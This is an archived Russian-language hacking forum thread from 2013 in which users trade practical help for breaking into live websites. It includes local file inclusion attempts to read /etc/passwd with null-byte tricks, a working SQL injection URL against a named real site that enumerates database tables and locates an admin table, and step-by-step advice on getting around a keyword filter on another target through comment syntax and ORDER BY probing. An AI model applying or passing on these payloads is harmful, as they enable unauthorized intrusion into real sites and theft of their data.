ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.11.2013, 19:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
552
Репутация:
0
|
|
Сообщение от Inoms
Inoms said:
Его ничем нельзя отрезать ибо он заранее указан как префикс, можно подключить локальный файл, например ../../../../../../etc/passwd (если Unix), почитать логи, выполнить через них код и т.д
Окей, я начал пробовать подключить этот файл, но выводится следующее сообщение
Код HTML:
HTML:
Warning: include(inc/../../../../../../../etc/passwd.php)
Когда же добавляю ../../../../../../etc/passwd%00, то вместо ошибки на сайте выводится стандартная страница, как будто без параметров отправился запрос. Какие тут возможные действия дальше?
|
|
|
|
09.11.2013, 20:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от SunHere
SunHere said:
Окей, я начал пробовать подключить этот файл, но выводится следующее сообщение
Код HTML:
HTML:
Warning: include(inc/../../../../../../../etc/passwd.php)
Когда же добавляю ../../../../../../etc/passwd%00, то вместо ошибки на сайте выводится стандартная страница, как будто без параметров отправился запрос. Какие тут возможные действия дальше? Просмотри исходный код страници и как вариант еще попробовать ../../../../../../etc/passwd %000 иногда проходит.
|
|
|
10.11.2013, 19:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Нашёл скулю, не могу достать данные с таблицы admin
Код:
Code:
http://www.olvia.ru/rus/products.php?s=3%27+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+50,99+--+
|
|
|
|
10.11.2013, 19:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Нашёл скулю, не могу достать данные с таблицы admin
Код:
Code:
http://www.olvia.ru/rus/products.php?s=3%27+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+50,99+--+
таблица admin находится в базе test
|
|
|
|
10.11.2013, 19:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
1297
Репутация:
0
|
|
Добрый день)
server.com/index.php?id=22' выдает следующее:
DB ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22'' LIMIT 1' at line 1
SELECT * FROM `Films` WHERE `ID` = '22'' LIMIT 1
Notice: Undefined index: ID in /usr/local/www/server.com/index.php on line 75
При попытке вставить в запрос UNION SELECT подвисает (Код ошибки: ERR_TIMED_OUT), на UNION SELCT:
SELECT * FROM `Films` WHERE `ID` = '22' UNION SELCT' LIMIT 1
Как нибудь можно обойти? И еще фильтрует ##
|
|
|
|
10.11.2013, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от chado
chado said:
Добрый день)
server.com/index.php?id=22' выдает следующее:
DB ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22'' LIMIT 1' at line 1
SELECT * FROM `Films` WHERE `ID` = '22'' LIMIT 1
Notice: Undefined index: ID in /usr/local/www/server.com/index.php on line 75
При попытке вставить в запрос UNION SELECT подвисает (Код ошибки: ERR_TIMED_OUT), на UNION SELCT:
SELECT * FROM `Films` WHERE `ID` = '22' UNION SELCT' LIMIT 1
Как нибудь можно обойти? И еще фильтрует ##
нужно закомментировать остаток запроса --+
|
|
|
|
11.11.2013, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
1297
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
нужно закомментировать остаток запроса --+
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1
server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1
Видимо комментирование только через # и этот символ фильтруется.
Что нибудь можно сделать?
|
|
|
|
11.11.2013, 14:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от chado
chado said:
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1
server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1
Видимо комментирование только через # и этот символ фильтруется.
Что нибудь можно сделать?
Попробуй аналог незакрытого коммментария /* для 5-ой версии mysql:
|
|
|
|
11.11.2013, 14:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от chado
chado said:
server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1
server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
выдает в коде ошибки:
SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1
Видимо комментирование только через # и этот символ фильтруется.
Что нибудь можно сделать?
server.com/index.php?id=1'+order+by+100--+1
|
|
|
|
11.11.2013, 15:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
1297
Репутация:
0
|
|
Сообщение от Expl0ited
Expl0ited said:
Попробуй аналог незакрытого коммментария /* для 5-ой версии mysql:
server.com/index.php?id=-1'+OR+`ID`+=+'202
выдает правильную страницу (SELECT * FROM `Films` WHERE `ID` = '-1' OR `ID`='202' LIMIT 1), на нем и тестирую:
server.com/index.php?id=-1'+OR+`ID`+=+'202';%00
показывает правильную страницу (ID = 202) без ошибок. Я так понимаю комментирование работает?
Сообщение от Expl0ited
Expl0ited said:
server.com/index.php?id=202'+order+by+100--+1
В чистом виде выдает:
DB ERROR: Unknown column '100' in 'order clause'
SELECT * FROM `Films` WHERE `ID` = '202' order by 100-- 1' LIMIT 1
c order+by+1 до order+by+9
выдает правильную страницу.
Как засунуть туда union select, если при слове select страница отваливается по timeout? Пробовал и в разных регистрах, и со скобками - не работает. Может есть другие запросы для "побаловаться" с базой?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
